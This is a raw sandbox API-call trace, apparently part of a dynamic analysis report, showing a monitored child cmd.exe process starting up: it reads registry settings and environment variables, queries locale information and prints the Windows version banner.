[0207.757] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0207.757] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0207.757] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0207.757] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0207.757] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0207.757] VirtualFree (lpAddress=0x2f60000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0207.758] VirtualFree (lpAddress=0x2eb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0207.758] VirtualFree (lpAddress=0x2e20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0207.758] VirtualFree (lpAddress=0x4460000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0207.762] VirtualFree (lpAddress=0x2ce0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0207.762] VirtualFree (lpAddress=0x2cd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0207.763] GetProcessHeap () returned 0x900000 [0207.763] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x96e778 | out: hHeap=0x900000) returned 1 [0207.763] TerminateThread (hThread=0x294, dwExitCode=0x0) Thread: id = 225 os_tid = 0x56c Process: id = "19" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x36e25000" os_pid = "0x318" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "18" os_parent_pid = "0x7b8" cmd_line = "\"C:\\Windows\\System32\\cmd.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e51c" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 187 os_tid = 0x350 [0187.605] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x3dff44 | out: lpSystemTimeAsFileTime=0x3dff44*(dwLowDateTime=0xbc6c2650, dwHighDateTime=0x1d6a092)) [0187.605] GetCurrentProcessId () returned 0x318 [0187.605] GetCurrentThreadId () returned 0x350 [0187.605] GetTickCount () returned 0x113d3a4 [0187.605] QueryPerformanceCounter (in: lpPerformanceCount=0x3dff3c | out: lpPerformanceCount=0x3dff3c*=12857677613) returned 1 [0187.607] GetModuleHandleA (lpModuleName=0x0) returned 0x4a410000 [0187.616] __set_app_type (_Type=0x1) [0187.616] __p__fmode () returned 0x768131f4 [0187.735] __p__commode () returned 0x768131fc [0187.735] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a4321a6) returned 0x0 [0187.735] __getmainargs (in: _Argc=0x4a434238, _Argv=0x4a434240, _Env=0x4a43423c, _DoWildCard=0, _StartInfo=0x4a434140 | out: _Argc=0x4a434238, _Argv=0x4a434240, _Env=0x4a43423c) returned 0 [0187.735] GetCurrentThreadId () returned 0x350 [0187.735] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x350) returned 0x60 [0187.736] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76210000 [0187.736] GetProcAddress (hModule=0x76210000, lpProcName="SetThreadUILanguage") returned 0x7623a84f [0187.736] SetThreadUILanguage (LangId=0x0) returned 0x409 [0187.736] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0187.736] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x3dfed4 | out: phkResult=0x3dfed4*=0x0) returned 0x2 [0187.736] VirtualQuery (in: lpAddress=0x3dff0b, lpBuffer=0x3dfea4, dwLength=0x1c | out: lpBuffer=0x3dfea4*(BaseAddress=0x3df000, AllocationBase=0x2e0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0187.736] VirtualQuery (in: lpAddress=0x2e0000, lpBuffer=0x3dfea4, dwLength=0x1c | out: lpBuffer=0x3dfea4*(BaseAddress=0x2e0000, AllocationBase=0x2e0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0187.736] VirtualQuery (in: lpAddress=0x2e1000, lpBuffer=0x3dfea4, dwLength=0x1c | out: lpBuffer=0x3dfea4*(BaseAddress=0x2e1000, AllocationBase=0x2e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0187.736] VirtualQuery (in: lpAddress=0x2e3000, lpBuffer=0x3dfea4, dwLength=0x1c | out: lpBuffer=0x3dfea4*(BaseAddress=0x2e3000, AllocationBase=0x2e0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0187.736] VirtualQuery (in: lpAddress=0x3e0000, lpBuffer=0x3dfea4, dwLength=0x1c | out: lpBuffer=0x3dfea4*(BaseAddress=0x3e0000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x140000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0187.736] GetConsoleOutputCP () returned 0x1b5 [0187.737] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a434260 | out: lpCPInfo=0x4a434260) returned 1 [0187.737] SetConsoleCtrlHandler (HandlerRoutine=0x4a42e72a, Add=1) returned 1 [0187.737] _get_osfhandle (_FileHandle=1) returned 0x7 [0187.737] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0187.737] _get_osfhandle (_FileHandle=1) returned 0x7 [0187.737] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a4341ac | out: lpMode=0x4a4341ac) returned 1 [0187.737] _get_osfhandle (_FileHandle=1) returned 0x7 [0187.737] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0187.738] _get_osfhandle (_FileHandle=0) returned 0x3 [0187.738] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a4341b0 | out: lpMode=0x4a4341b0) returned 1 [0187.769] _get_osfhandle (_FileHandle=0) returned 0x3 [0187.769] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0187.770] GetEnvironmentStringsW () returned 0x6f2860* [0187.770] GetProcessHeap () returned 0x6e0000 [0187.770] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0xaca) returned 0x6f3338 [0187.770] FreeEnvironmentStringsW (penv=0x6f2860) returned 1 [0187.770] GetProcessHeap () returned 0x6e0000 [0187.770] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0x4) returned 0x6f0bf0 [0187.770] GetEnvironmentStringsW () returned 0x6f2860* [0187.770] GetProcessHeap () returned 0x6e0000 [0187.770] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0xaca) returned 0x6f3e10 [0187.770] FreeEnvironmentStringsW (penv=0x6f2860) returned 1 [0187.770] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x3dee44 | out: phkResult=0x3dee44*=0x68) returned 0x0 [0187.770] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x3dee4c, lpData=0x3dee50, lpcbData=0x3dee48*=0x1000 | out: lpType=0x3dee4c*=0x0, lpData=0x3dee50*=0x32, lpcbData=0x3dee48*=0x1000) returned 0x2 [0187.771] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x3dee4c, lpData=0x3dee50, lpcbData=0x3dee48*=0x1000 | out: lpType=0x3dee4c*=0x4, lpData=0x3dee50*=0x1, lpcbData=0x3dee48*=0x4) returned 0x0 [0187.771] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x3dee4c, lpData=0x3dee50, lpcbData=0x3dee48*=0x1000 | out: lpType=0x3dee4c*=0x0, lpData=0x3dee50*=0x1, lpcbData=0x3dee48*=0x1000) returned 0x2 [0187.771] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x3dee4c, lpData=0x3dee50, lpcbData=0x3dee48*=0x1000 | out: lpType=0x3dee4c*=0x4, lpData=0x3dee50*=0x0, lpcbData=0x3dee48*=0x4) returned 0x0 [0187.771] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x3dee4c, lpData=0x3dee50, lpcbData=0x3dee48*=0x1000 | out: lpType=0x3dee4c*=0x4, lpData=0x3dee50*=0x40, lpcbData=0x3dee48*=0x4) returned 0x0 [0187.771] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x3dee4c, lpData=0x3dee50, lpcbData=0x3dee48*=0x1000 | out: lpType=0x3dee4c*=0x4, lpData=0x3dee50*=0x40, lpcbData=0x3dee48*=0x4) returned 0x0 [0187.771] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x3dee4c, lpData=0x3dee50, lpcbData=0x3dee48*=0x1000 | out: lpType=0x3dee4c*=0x0, lpData=0x3dee50*=0x40, lpcbData=0x3dee48*=0x1000) returned 0x2 [0187.771] RegCloseKey (hKey=0x68) returned 0x0 [0187.771] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x3dee44 | out: phkResult=0x3dee44*=0x68) returned 0x0 [0187.771] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x3dee4c, lpData=0x3dee50, lpcbData=0x3dee48*=0x1000 | out: lpType=0x3dee4c*=0x0, lpData=0x3dee50*=0x40, lpcbData=0x3dee48*=0x1000) returned 0x2 [0187.771] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x3dee4c, lpData=0x3dee50, lpcbData=0x3dee48*=0x1000 | out: lpType=0x3dee4c*=0x4, lpData=0x3dee50*=0x1, lpcbData=0x3dee48*=0x4) returned 0x0 [0187.771] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x3dee4c, lpData=0x3dee50, lpcbData=0x3dee48*=0x1000 | out: lpType=0x3dee4c*=0x0, lpData=0x3dee50*=0x1, lpcbData=0x3dee48*=0x1000) returned 0x2 [0187.771] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x3dee4c, lpData=0x3dee50, lpcbData=0x3dee48*=0x1000 | out: lpType=0x3dee4c*=0x4, lpData=0x3dee50*=0x0, lpcbData=0x3dee48*=0x4) returned 0x0 [0187.771] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x3dee4c, lpData=0x3dee50, lpcbData=0x3dee48*=0x1000 | out: lpType=0x3dee4c*=0x4, lpData=0x3dee50*=0x9, lpcbData=0x3dee48*=0x4) returned 0x0 [0187.771] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x3dee4c, lpData=0x3dee50, lpcbData=0x3dee48*=0x1000 | out: lpType=0x3dee4c*=0x4, lpData=0x3dee50*=0x9, lpcbData=0x3dee48*=0x4) returned 0x0 [0187.771] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x3dee4c, lpData=0x3dee50, lpcbData=0x3dee48*=0x1000 | out: lpType=0x3dee4c*=0x0, lpData=0x3dee50*=0x9, lpcbData=0x3dee48*=0x1000) returned 0x2 [0187.771] RegCloseKey (hKey=0x68) returned 0x0 [0187.771] time (in: timer=0x0 | out: timer=0x0) returned 0x5f844b2a [0187.771] srand (_Seed=0x5f844b2a) [0187.771] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\"" [0187.771] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\"" [0188.322] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a435260 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0188.322] GetProcessHeap () returned 0x6e0000 [0188.322] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0x210) returned 0x6f48e8 [0188.322] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x6f48f0, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0188.322] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a440640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0188.322] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a440640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0188.322] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a440640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0188.322] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0188.322] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0188.323] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0188.323] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0188.323] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0188.323] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0188.323] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0188.323] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0188.323] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0188.323] GetProcessHeap () returned 0x6e0000 [0188.323] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x6f3338 | out: hHeap=0x6e0000) returned 1 [0188.323] GetEnvironmentStringsW () returned 0x6f2860* [0188.323] GetProcessHeap () returned 0x6e0000 [0188.323] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0xae2) returned 0x6f55f0 [0188.324] FreeEnvironmentStringsW (penv=0x6f2860) returned 1 [0188.324] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a440640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0188.324] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a440640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0188.324] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0188.324] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0188.324] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0188.324] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0188.324] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0188.324] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0188.324] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0188.324] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0188.324] GetProcessHeap () returned 0x6e0000 [0188.324] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0x30) returned 0x6f19f0 [0188.324] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3dfc10 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0188.325] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x104, lpBuffer=0x3dfc10, lpFilePart=0x3dfc0c | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x3dfc0c*="system32") returned 0x13 [0188.325] GetFileAttributesW (lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32")) returned 0x10 [0188.325] FindFirstFileW (in: lpFileName="C:\\Windows", lpFindFileData=0x3df98c | out: lpFindFileData=0x3df98c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 0x6f1a98 [0188.325] FindClose (in: hFindFile=0x6f1a98 | out: hFindFile=0x6f1a98) returned 1 [0188.325] FindFirstFileW (in: lpFileName="C:\\Windows\\system32", lpFindFileData=0x3df98c | out: lpFindFileData=0x3df98c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="System32", cAlternateFileName="")) returned 0x6f1a98 [0188.325] FindClose (in: hFindFile=0x6f1a98 | out: hFindFile=0x6f1a98) returned 1 [0188.325] GetFileAttributesW (lpFileName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32")) returned 0x10 [0188.325] SetCurrentDirectoryW (lpPathName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32")) returned 1 [0188.326] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Windows\\System32") returned 1 [0188.326] GetProcessHeap () returned 0x6e0000 [0188.326] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x6f55f0 | out: hHeap=0x6e0000) returned 1 [0188.326] GetEnvironmentStringsW () returned 0x6f2860* [0188.326] GetProcessHeap () returned 0x6e0000 [0188.326] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0xb12) returned 0x6f4b00 [0188.326] FreeEnvironmentStringsW (penv=0x6f2860) returned 1 [0188.326] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a435260 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0188.326] GetProcessHeap () returned 0x6e0000 [0188.326] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x6f19f0 | out: hHeap=0x6e0000) returned 1 [0188.326] GetProcessHeap () returned 0x6e0000 [0188.326] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0x400e) returned 0x6f6c00 [0188.326] GetProcessHeap () returned 0x6e0000 [0188.326] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x6f6c00 | out: hHeap=0x6e0000) returned 1 [0188.326] GetConsoleOutputCP () returned 0x1b5 [0188.327] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a434260 | out: lpCPInfo=0x4a434260) returned 1 [0188.327] GetUserDefaultLCID () returned 0x409 [0188.327] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a434950, cchData=8 | out: lpLCData=":") returned 2 [0188.328] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x3dfd50, cchData=128 | out: lpLCData="0") returned 2 [0188.328] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x3dfd50, cchData=128 | out: lpLCData="0") returned 2 [0188.328] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x3dfd50, cchData=128 | out: lpLCData="1") returned 2 [0188.328] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a434940, cchData=8 | out: lpLCData="/") returned 2 [0188.328] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a434d80, cchData=32 | out: lpLCData="Mon") returned 4 [0188.328] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a434d40, cchData=32 | out: lpLCData="Tue") returned 4 [0188.328] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a434d00, cchData=32 | out: lpLCData="Wed") returned 4 [0188.328] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a434cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0188.328] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a434c80, cchData=32 | out: lpLCData="Fri") returned 4 [0188.328] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a434c40, cchData=32 | out: lpLCData="Sat") returned 4 [0188.328] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a434c00, cchData=32 | out: lpLCData="Sun") returned 4 [0188.328] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a434930, cchData=8 | out: lpLCData=".") returned 2 [0188.329] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a434920, cchData=8 | out: lpLCData=",") returned 2 [0188.329] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0188.330] GetProcessHeap () returned 0x6e0000 [0188.330] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20c) returned 0x6f5620 [0188.330] GetConsoleTitleW (in: lpConsoleTitle=0x6f5620, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0188.330] _get_osfhandle (_FileHandle=1) returned 0x7 [0188.330] GetFileType (hFile=0x7) returned 0x2 [0188.331] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0188.331] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3dfe4c | out: lpMode=0x3dfe4c) returned 1 [0188.331] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0188.331] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x3dfe68 | out: lpConsoleScreenBufferInfo=0x3dfe68) returned 1 [0188.331] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0188.331] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x3dfe34 | out: lpConsoleScreenBufferInfo=0x3dfe34) returned 1 [0188.332] FillConsoleOutputAttribute (in: hConsoleOutput=0x7, wAttribute=0x7, nLength=0x5dc0, dwWriteCoord=0x0, lpNumberOfAttrsWritten=0x3dfe4c | out: lpNumberOfAttrsWritten=0x3dfe4c) returned 1 [0188.332] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1 [0188.332] BrandingFormatString () returned 0x6f5838 [0188.338] GetVersion () returned 0x1db10106 [0188.338] _vsnwprintf (in: _Buffer=0x3dfe84, _BufferCount=0x1f, _Format="%d.%d.%04d", _ArgList=0x3dfe40 | out: _Buffer="6.1.7601") returned 8 [0188.338] _get_osfhandle (_FileHandle=1) returned 0x7 [0188.338] GetFileType (hFile=0x7) returned 0x2 [0188.338] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0188.338] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3dfdd0 | out: lpMode=0x3dfdd0) returned 1 [0188.339] _get_osfhandle (_FileHandle=1) returned 0x7 [0188.339] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x3dfe04 | out: lpConsoleScreenBufferInfo=0x3dfe04) returned 1 [0188.339] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2350, dwLanguageId=0x0, lpBuffer=0x4a444640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="Microsoft Windows [Version %1]") returned 0x1e [0188.339] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2350, dwLanguageId=0x0, lpBuffer=0x4a444640, nSize=0x2000, Arguments=0x3dfe44 | out: lpBuffer="Microsoft Windows [Version 6.1.7601]") returned 0x24 [0188.339] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a444640*, nNumberOfCharsToWrite=0x24, lpNumberOfCharsWritten=0x3dfe28, lpReserved=0x0 | out: lpBuffer=0x4a444640*, lpNumberOfCharsWritten=0x3dfe28*=0x24) returned 1 [0188.340] _vsnwprintf (in: _Buffer=0x4a444640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x3dfe50 | out: _Buffer="\r\n") returned 2 [0188.340] _get_osfhandle (_FileHandle=1) returned 0x7 [0188.340] GetFileType (hFile=0x7) returned 0x2 [0188.340] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0188.340] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3dfe10 | out: lpMode=0x3dfe10) returned 1 [0188.340] _get_osfhandle (_FileHandle=1) returned 0x7 [0188.340] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a444640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x3dfe3c, lpReserved=0x0 | out: lpBuffer=0x4a444640*, lpNumberOfCharsWritten=0x3dfe3c*=0x2) returned 1 [0188.341] _vsnwprintf (in: _Buffer=0x4a444640, _BufferCount=0x1fff, _Format="%s", _ArgList=0x3dfe58 | out: _Buffer="Copyright (c) 2009 Microsoft Corporation. All rights reserved.") returned 63 [0188.341] _get_osfhandle (_FileHandle=1) returned 0x7 [0188.341] GetFileType (hFile=0x7) returned 0x2 [0188.341] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0188.341] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3dfe18 | out: lpMode=0x3dfe18) returned 1 [0188.341] _get_osfhandle (_FileHandle=1) returned 0x7 [0188.342] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a444640*, nNumberOfCharsToWrite=0x3f, lpNumberOfCharsWritten=0x3dfe44, lpReserved=0x0 | out: lpBuffer=0x4a444640*, lpNumberOfCharsWritten=0x3dfe44*=0x3f) returned 1 [0188.342] _vsnwprintf (in: _Buffer=0x4a444640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x3dfe54 | out: _Buffer="\r\n") returned 2 [0188.342] _get_osfhandle (_FileHandle=1) returned 0x7 [0188.342] GetFileType (hFile=0x7) returned 0x2 [0188.342] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0188.342] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3dfe14 | out: lpMode=0x3dfe14) returned 1 [0188.343] _get_osfhandle (_FileHandle=1) returned 0x7 [0188.343] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a444640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x3dfe40, lpReserved=0x0 | out: lpBuffer=0x4a444640*, lpNumberOfCharsWritten=0x3dfe40*=0x2) returned 1 [0188.344] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76210000 [0188.344] GetProcAddress (hModule=0x76210000, lpProcName="CopyFileExW") returned 0x76243b92 [0188.344] GetProcAddress (hModule=0x76210000, lpProcName="IsDebuggerPresent") returned 0x76224a5d [0188.344] GetProcAddress (hModule=0x76210000, lpProcName="SetConsoleInputExeNameW") returned 0x7623a79d [0188.344] _get_osfhandle (_FileHandle=0) returned 0x3 [0188.344] GetFileType (hFile=0x3) returned 0x2 [0188.344] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3 [0188.344] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x3dfec8 | out: lpMode=0x3dfec8) returned 1 [0188.345] NtOpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x8, OpenAsSelf=0, TokenHandle=0x3dfc84 | out: TokenHandle=0x3dfc84*=0x0) returned 0xc000007c [0188.345] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3dfc84 | out: TokenHandle=0x3dfc84*=0x74) returned 0x0 [0188.345] NtQueryInformationToken (in: TokenHandle=0x74, TokenInformationClass=0x12, TokenInformation=0x3dfc50, TokenInformationLength=0x4, ReturnLength=0x3dfc64 | out: TokenInformation=0x3dfc50, ReturnLength=0x3dfc64) returned 0x0 [0188.345] NtQueryInformationToken (in: TokenHandle=0x74, TokenInformationClass=0x1a, TokenInformation=0x3dfc5c, TokenInformationLength=0x4, ReturnLength=0x3dfc60 | out: TokenInformation=0x3dfc5c, ReturnLength=0x3dfc60) returned 0x0 [0188.345] NtClose (Handle=0x74) returned 0x0 [0188.345] GetProcessHeap () returned 0x6e0000 [0188.345] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x6f48e8 | out: hHeap=0x6e0000) returned 1 [0188.346] _vsnwprintf (in: _Buffer=0x4a444640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x3dfbb4 | out: _Buffer="\r\n") returned 2 [0188.346] _get_osfhandle (_FileHandle=1) returned 0x7 [0188.346] GetFileType (hFile=0x7) returned 0x2 